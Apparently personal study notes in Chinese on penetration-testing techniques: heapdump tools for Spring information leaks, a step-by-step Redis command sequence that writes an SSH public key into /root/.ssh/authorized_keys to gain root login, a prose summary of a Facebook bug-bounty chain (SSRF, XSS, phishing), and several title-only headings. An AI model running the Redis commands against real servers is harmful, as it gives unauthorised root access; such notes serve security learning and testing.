随手记

一、某医院的实战渗透测试(组合拳)

  1. Spring信息泄露

    1. 下载下来的heapdump文件,可以使用工具进行内容检索,下面为几个常用的heapdump查看工具。

      <https://github.com/wyzxxz/heapdump_tool(比较常用)>
      <https://github.com/whwlsfb/JDumpSpider(用法简单)>
      
  2. Redis写公钥

    ssh-keygen -t rsa //执行生成key命令
    (echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key.txt //将公钥写入txt
    
    cat /root/.ssh/key.txt | redis-cli -h 172.16.198.244 -a redis -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中,-a是因为redis存在密码,而不是未授权。
    
    连接redis进行
    redis-cli -h 172.16.198.244 -p 6379 -a redis //使用客户端登录目标
    config set dir /root/.ssh //设置存储公钥路径,redis的备份路径
    config get dir //查看是否设置成功
    config set dbfilename "authorized_keys" //设置文件名称
    save //保存
    
    5、 ssh -i id_rsa [email protected] //进行ssh连接即可
    
    ps:也可以把id_rsa转换为PEM格式。然后把生成的id_rsa文件导入到finalshell,用户名是root,即可连接。
    
    

二、实战 | 我如何通过向 Facebook 提交漏洞赚取31500美元

  1. m-nexus.thefacebook.com 重定向到“ https://m-nexus.thefacebook.com/servlet/mstrWebAdmin,发现 mstrWebAdmin 这是基于MicroStrategy工具构建的商业智能门户
  2. 从 MicroStrategy 的官方配置文档中,我发现有两个端点可以公开访问。
    1. https://m-nexus.thefacebook.com/servlet/taskProc 不需要身份验证。
    2. 让我们下载托管的 Web 应用程序并开始源代码审查。我下载了一个400多MB的应用程序包。包中有几个脚本和 jar 文件。
  3. jd-gui工具反编译了那个 jar 文件并开始审查代码
    1. ssrf(此处仅支持 tinyurl 处理过的 url)
    2. xss + ssrf
    3. 借助SSRF的钓鱼攻击
    4. ssrf + 基于字典的暴力攻击,这些链接将用户重定向到内部系统,但内部系统会将用户重定向到 Facebook 主域(即 facebook.com)。

三、基于资源的约束委派(RBCD)

四、分享一款越权测试的神器

五、AD学习记录(上)

周末待看